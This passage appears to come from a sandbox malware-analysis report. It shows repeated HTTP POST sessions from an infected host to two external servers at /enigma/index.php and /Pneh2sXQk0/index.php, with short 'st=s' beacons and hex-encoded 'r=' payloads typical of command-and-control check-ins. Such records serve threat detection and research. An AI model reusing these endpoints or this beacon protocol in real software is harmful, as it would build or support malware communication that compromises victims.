                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:30.443958998 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1203192.168.2.551057193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:30.367753983 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:30.611819983 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1204192.168.2.551058193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:30.804811954 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:31.050292015 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1205192.168.2.551059193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:30.856894970 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:31.101797104 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1206192.168.2.551060193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:31.298693895 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:31.546905041 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1207192.168.2.551061193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:31.462999105 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:31.706831932 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1208192.168.2.551062193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:31.893002987 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:32.134742975 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1209192.168.2.551063193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:31.963516951 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:32.216950893 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1210192.168.2.551064193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:32.386051893 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:32.639692068 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1211192.168.2.551065193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:32.579780102 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:32.832335949 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1212192.168.2.551066193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:32.993926048 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:33.242005110 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1213192.168.2.551067193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:33.088392019 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:33.344263077 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1214192.168.2.551068193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:33.494996071 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:33.747904062 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1215192.168.2.551069193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:33.699347973 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:33.948575020 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1216192.168.2.551070193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:34.085194111 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:34.328098059 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1217192.168.2.551071193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:34.201555967 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:34.458671093 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1218192.168.2.551072193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:34.576683998 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:34.825777054 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1219192.168.2.551073193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:34.819503069 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:35.064300060 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
